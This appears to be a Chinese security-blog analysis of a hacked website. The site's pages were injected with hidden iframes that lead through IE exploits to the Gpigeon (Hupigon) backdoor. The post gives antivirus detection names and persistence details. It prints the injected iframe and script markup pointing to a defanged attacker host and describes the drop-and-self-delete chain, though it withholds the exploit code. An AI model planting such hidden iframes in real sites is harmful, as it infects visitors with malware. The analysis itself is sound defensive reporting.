[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)

简介: [07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)

该网站首页被加入代码:

--------------
<iframe src=hxxp://duolaa***meng.diy.myrice.com/bushan.htm width=0 height=0 frameborder=0></iframe>
--------------
hxxp://duolaa***meng.diy.myrice.com/bushan.htm 的代码为:
--------------
<iframe src=hxxp://duolaa***meng.diy.myrice.com/girl.html width=0 height=0 frameborder=0></iframe>
<iframe src=hxxp://duolaa***meng.diy.myrice.com/xxxxx.htm width=0 height=0 frameborder=0></iframe>
<iframe src=hxxp://duolaa***meng.diy.myrice.com/ray.htm width=0 height=0 frameborder=0></iframe>
<script src="hxxp://www.xcinfo.ha.cn/jsq/default.asp?User=duolaameng&Length=6&x=15&y=20&Mode=002"></script>
<script language=javascript>
<!--
var m_tc_server="vip7.t2t2.com";
var m_tc_website="51933";
var m_tc_parent_website="0";
var m_tc_style="1";
//-->
</script>
<script language=javascript src="hxxp://vip7.t2t2.com/visit.js"></script>
--------------

hxxp://duolaa***meng.diy.myrice.com/girl.html 代码略。Kaspersky报为:Trojan-Downloader.JS.Small.cr,瑞星报为:Hack.Exploit.JS.IeWmv.a。

hxxp://duolaa***meng.diy.myrice.com/xxxxx.htm  代码略。Kaspersky报为 Exploit.HTML.Mht,瑞星报为 Script.Trojan.b。利用IE漏洞下载文件 hxxp://duolaa***meng.diy.myrice.com/xxxxx.chm。

xxxxx.chm 包含2个文件:

1、xxxxx.exe 是灰鸽子文件。Kaspersky 报为 Backdoor.Win32.Hupigon.aho,瑞星报为 Backdoor.Gpigeon.2006.sa,江民KV 报为 Backdoor/Huigezi.eyl。

会把自已复制为 %windir%/Wintimes.exe,创建名为"Wintimes"的系统服务用于启动

HijackThis 1.99.1的log显示为:

---------

O23 - Service: Wintimes - Unknown owner - C:/WINDOWS/Wintimes.exe (file missing)

---------

释放 %windir%/Wintimes.DLL Kaspersky 报为 Backdoor.Win32.Hupigon.buo,瑞星报为 Backdoor.Gpigeon.2006.po。

2、xxxxx.htm Kaspersky报为 Exploit.HTML.CodeBaseExec,瑞星报为 Hack.Exploit.HTML.CodeExec。

hxxp://duolaa***meng.diy.myrice.com/ray.htm  代码略。利用IE漏洞,下载下列文件:

1、hxxp://duolaa***meng.diy.myrice.com/Setup.exe Kaspersky 报为 Backdoor.Win32.Hupigon.buo,瑞星报为 Backdoor.Gpigeon.2006.rz。

2、hxxp://duolaa***meng.diy.myrice.com/ray.exe

未能获取

3、hxxp://duolaa***meng.diy.myrice.com/ray.gif

ray.gif  其实是个脚本程序文件,其功能为:利用ADODB创建并运行文件 NTDETECT.hta。

NTDETECT.hta 在IE临时文件夹里搜索 ray[1].exe 和 ray[2].exe,把它复制为 C:/only23.exe 并运行;创建并运行文件 c:/cmd.bat。

c:/cmd.bat 负责删除 NTDETECT.hta 和 c:/cmd.bat

ray.gif的代码略。可参考:

利用ADODB写文件——恶意文件young.gif代码的分析心得1

javascript:void(0)

hxxp://vip7.t2t2.com/visit.js 是[太极统计]的代码

hxxp://www.xcinfo.ha.cn/jsq/default.asp?User=duolaameng&Length=6&x=15&y=20&Mode=002


相关文章
|
3月前
|
数据安全/隐私保护
一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
|
3月前
|
开发框架 Java .NET
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
|
3月前
|
安全 JavaScript 前端开发
一个下载木马的网站
一个下载木马的网站
|
7月前
|
安全 Shell
2021Kali -- 木马免杀制作
2021Kali -- 木马免杀制作
109 1
|
安全 Windows
14 向日葵远程RCE漏洞
向日葵是一款远控软件
14 向日葵远程RCE漏洞
|
安全 Linux 测试技术
Metasploit 实现木马生成、捆绑及免杀
在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。
|
安全
Windows10被曝漏洞,受害者电脑沦为“肉鸡”
一旦被攻击者利用,电脑里的任何应用都可能拥有系统权限,攻击者可以执行危害级别更高的恶意行为,受害者电脑沦为“肉鸡”。
443 0
|
Web App开发 运维 安全
“NetSarang的Xmanager和Xshell多种产品被植入后门事件”分析报告
NetSarang是一家国外以提供安全连接解决方案的公司,其产品以Xmanager Enterprise, Xmanager, Xshell, Xftp, Xlpd远程连接管理客户端软件,一般应用于IT运维技术人员进行远程运维管理。
7512 0
|
安全
谨防沦为DLL后门木马及其变种的肉鸡
卡巴斯基实验室近期发现有一种名为“DLL后门木马”的恶意软件活动比较频繁。 该木马采用Delphi语言编写,未加壳,但其具有伪造的数字签名,而且其变种竟然高达390多种。此木马主要通过网页挂马等方式感染用户计算机,危害性比较大。
929 0